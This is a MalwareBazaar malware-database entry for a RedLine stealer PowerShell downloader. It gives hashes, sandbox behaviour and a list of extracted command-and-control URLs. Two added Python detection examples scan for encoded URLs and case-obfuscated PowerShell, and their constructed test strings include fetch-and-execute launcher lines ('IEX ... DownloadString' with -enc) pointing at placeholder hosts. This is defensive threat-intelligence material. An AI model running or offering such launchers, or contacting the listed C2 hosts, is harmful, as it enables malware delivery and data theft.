MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



RedLineStealer


Vendor detections: 8



SHA256 hash: 8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9
SHA3-384 hash: 944e4acf56444593df243eabe941be4472e41773935bd1b6a64cbaa0635f7ad8c114a63ff5bc821962554ceb631f5731
SHA1 hash: 14fa1399d6031b1f9c4df109e4e4b2e572d5706a
MD5 hash: 20581279d66ec4840c8ec63d11064493
humanhash: early-quiet-network-hamper
File name: mx1.ps1
Signature: RedLineStealer
File size: 852 bytes
First seen: 2022-01-18 12:11:59 UTC
Last seen: Never
File type: PowerShell (PS) ps1
MIME type: text/plain
ssdeep: 24:iR1tJOxwIAEVWdTagQxhxUOj6AIyChZOY:K7sWIAEVCTb6xUPAIyCuY
TLSH: T1F101CCB9CF61FDE1031F758054143E2B20EDC727AB391E28E5A019B3A838352EF23188
Reporter: Anonymous
Tags: ps1 RedLineStealer

Intelligence


File Origin
# of uploads: 1
# of downloads: 239
Origin country: n/a
Vendor Threat Intelligence
Result
Verdict: MALICIOUS
Details:
Base64 Encoded URL: Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.
Empire PowerShell Request: Detected a base64 encoded PowerShell HTTP request that is likely sourced from Empire.
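Both detections above are string-level: a base64-encoded `http://` or `https://` has only three possible spellings per text encoding (one per 3-byte alignment), so a scanner can look for those fixed fragments in single-byte (ANSI) and UTF-16LE (UNICODE, the encoding PowerShell's `-EncodedCommand` consumes) form, and then decode the surrounding blob to recover the request, which is how an Empire-style `DownloadString` launcher surfaces. The Python below is an added example written for this page; it is not MalwareBazaar's or any vendor's detection code. The stager text it scans is constructed here (the `example.invalid` URLs are placeholders) and is not the contents of mx1.ps1.

```python
"""Added example: find base64-encoded http(s):// prefixes in a script body, in
single-byte (ANSI) and UTF-16LE (UNICODE) text at all three base64 alignments,
then decode the enclosing blobs to recover the URLs. Sample text is constructed."""
import base64
import binascii
import re
from typing import List, NamedTuple, Tuple

PREFIXES = ("http://", "https://")
CODECS = {"ansi": "ascii", "unicode": "utf-16-le"}
# Leading base64 chars that share bits with the `shift` bytes preceding the
# prefix inside its 3-byte group: 0 bytes -> 0 chars, 1 -> 2, 2 -> 3.
_LEAD_DROP = {0: 0, 1: 2, 2: 3}


class Hit(NamedTuple):
    encoding: str   # "ansi" or "unicode"
    prefix: str     # "http://" or "https://"
    shift: int      # alignment of the prefix inside its 3-byte base64 group
    offset: int     # byte offset of the matched fragment in the scanned data
    fragment: str   # the base64 characters that matched


def b64_fragments(prefix: str, codec: str) -> List[str]:
    """Base64 text that `prefix` produces at each of the 3 alignments, keeping
    only characters fully determined by the prefix bytes themselves."""
    raw = prefix.encode(codec)
    out = []
    for shift in range(3):
        enc = base64.b64encode(b"\x00" * shift + raw).decode("ascii").rstrip("=")
        enc = enc[_LEAD_DROP[shift]:]
        if (shift + len(raw)) % 3:      # last char also encodes bits of the next byte
            enc = enc[:-1]
        out.append(enc)
    return out


def scan(data: bytes) -> List[Hit]:
    """Report every occurrence of an encoded http(s):// prefix, any alignment."""
    hits = []
    for enc_name, codec in CODECS.items():
        for prefix in PREFIXES:
            for shift, frag in enumerate(b64_fragments(prefix, codec)):
                pos = data.find(frag.encode("ascii"))
                while pos != -1:
                    hits.append(Hit(enc_name, prefix, shift, pos, frag))
                    pos = data.find(frag.encode("ascii"), pos + 1)
    return sorted(hits, key=lambda h: h.offset)


_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{20,}={0,2}")
_URL = re.compile(r"https?://[^\s'\"()<>]+")


def _guess_codec(dec: bytes) -> str:
    # UTF-16LE text made of ASCII characters has a NUL in every odd byte.
    odd = dec[1::2]
    return "utf-16-le" if odd and odd.count(0) >= 0.8 * len(odd) else "ascii"


def recover_urls(data: bytes) -> List[Tuple[str, str]]:
    """Decode every long base64 run in `data` and pull http(s) URLs out of it."""
    found = []
    for m in _B64_RUN.finditer(data):
        blob = m.group(0).rstrip(b"=")
        if len(blob) % 4 == 1:          # a lone trailing sextet is never valid
            blob = blob[:-1]
        blob += b"=" * (-len(blob) % 4)
        try:
            dec = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue
        codec = _guess_codec(dec)
        for url in _URL.findall(dec.decode(codec, errors="ignore")):
            found.append((codec, url))
    return found


# Constructed stager text (not mx1.ps1): an ANSI blob holding a bare URL, and an
# Empire-style -enc launcher whose UTF-16LE script performs a DownloadString.
_ANSI_BLOB = base64.b64encode(b"http://example.invalid/update/x.ps1").decode()
_UNICODE_BLOB = base64.b64encode(
    "$wc=New-Object Net.WebClient;IEX $wc.DownloadString("
    "'http://example.invalid/wp-content/stage.ps1')".encode("utf-16-le")).decode()
SAMPLE = (
    "$u=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('"
    + _ANSI_BLOB + "'))\n"
    "powershell -noP -sta -w 1 -enc " + _UNICODE_BLOB + "\n"
).encode("ascii")

if __name__ == "__main__":
    for h in scan(SAMPLE):
        print(f"{h.encoding:7} {h.prefix:9} shift={h.shift} @{h.offset}: {h.fragment}")
    for codec, url in recover_urls(SAMPLE):
        print(f"recovered ({codec}): {url}")
```

`b64_fragments` derives the fragments instead of hard-coding them, dropping the leading characters that share bits with whatever precedes the prefix and the trailing one that shares bits with whatever follows, so the same routine can be pointed at any other string (`DownloadString`, `IEX`) to produce alignment-proof YARA strings for it. The decoder deliberately tries the blob as UTF-16LE before ASCII only when the odd bytes are NULs, since a UTF-16 script decoded as ASCII keeps the NULs and the URL regex would miss it.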
Threat name: Script-PowerShell.Trojan.Heuristic
Status: Malicious
First seen: 2022-01-18 10:08:05 UTC
File Type: Text (Batch)
AV detection: 7 of 27 (25.93%)
Threat level: 2/5
Result
Malware family: redline
Score: 10/10
Tags: family:guloader family:lokibot family:redline downloader guloader infostealer persistence spyware stealer suricata trojan
Behaviour
Delays execution with timeout.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of SetThreadContext
Adds Run key to start application
Checks computer location settings
Reads user/profile data of web browsers
Blocklisted process makes network request
Downloads MZ/PE file
Executes dropped EXE
Guloader Payload
Guloader,Cloudeye
Lokibot
RedLine
RedLine Payload
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
Malware Config
C2 Extraction:
http://2.56.56.96/dx/gas/pin.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Malware family: Lokibot
Verdict: Malicious
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: PowerShell_Case_Anomaly
Author: Florian Roth
Description: Detects obfuscated PowerShell hacktools
Reference: https://twitter.com/danielhbohannon/status/905096106924761088
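The rule's text is not reproduced on this page, only its name and description. The idea behind a case-anomaly signature is that legitimate scripts and command lines spell `powershell`, cmdlets and .NET members in a handful of conventional casings, while obfuscation frameworks randomise letter case to break case-sensitive string signatures. The Python below is an added example illustrating that idea; it is not Florian Roth's rule, and its allow-list of spellings and its two sample command lines are constructed for the example.

```python
"""Added example: flag PowerShell tokens written in unconventional letter case,
the kind of obfuscation a case-anomaly rule targets. Sample inputs are constructed."""
import re
from typing import List, Tuple

# Spellings seen in ordinary scripts and command lines. Assumed allow-list for
# this example; a real rule would be tuned against a corpus of clean scripts.
_ALLOWED = {
    "powershell": {"powershell", "Powershell", "PowerShell", "POWERSHELL"},
    "iex": {"iex", "IEX", "Iex"},
    "invoke-expression": {"invoke-expression", "Invoke-Expression", "INVOKE-EXPRESSION"},
    "new-object": {"new-object", "New-Object", "NEW-OBJECT"},
    "net.webclient": {"net.webclient", "Net.WebClient", "NET.WEBCLIENT"},
    "downloadstring": {"downloadstring", "DownloadString", "DOWNLOADSTRING"},
    "frombase64string": {"frombase64string", "FromBase64String", "FROMBASE64STRING"},
}

# Match each token case-insensitively as a whole word: no letter, digit,
# underscore or '-' directly on either side ('.' and ':' are allowed so that
# "Powershell.exe", ".DownloadString" and "::FromBase64String" still match).
_TOKEN_RES = {
    canon: re.compile(r"(?<![\w-])" + re.escape(canon) + r"(?![\w-])", re.IGNORECASE)
    for canon in _ALLOWED
}


def case_anomalies(script: str) -> List[Tuple[int, str, str]]:
    """Return (offset, canonical_token, as_written) for every token whose
    casing is not one of its allowed spellings, in order of appearance."""
    out = []
    for canon, rx in _TOKEN_RES.items():
        for m in rx.finditer(script):
            if m.group(0) not in _ALLOWED[canon]:
                out.append((m.start(), canon, m.group(0)))
    return sorted(out)


def looks_obfuscated(script: str, min_hits: int = 2) -> bool:
    """Two or more anomalous tokens is a strong signal; a single one may be a typo."""
    return len(case_anomalies(script)) >= min_hits


# Constructed inputs: a plainly written one-liner, and the same command with
# randomised letter case of the sort produced by obfuscation frameworks.
CLEAN = ("powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
         ".DownloadString('http://example.invalid/a.ps1')\"")
OBFUSCATED = ("PoWeRsHeLl -w hidden -c \"iEx (nEw-ObJeCt nEt.WeBcLiEnT)"
              ".dOwNlOaDsTrInG('http://example.invalid/a.ps1')\"")

if __name__ == "__main__":
    print(case_anomalies(CLEAN))
    for off, canon, seen in case_anomalies(OBFUSCATED):
        print(f"{off:4}  {canon:18} written as {seen}")
```

The allow-list approach is the same shape as a YARA rule that matches a string `nocase` and then excludes the expected casings; its weakness is that it only catches tokens you enumerated, so pair it with the base64 and string-length checks a sandbox already applies rather than relying on it alone.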

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download
Signature: RedLineStealer
File type: PowerShell (PS) ps1
SHA256 hash: 8784752106235713b6ca0619c8005d41e7c79a52cb52cb23e9ce61026837aae9 (this sample)

Delivery method: Distributed via web download
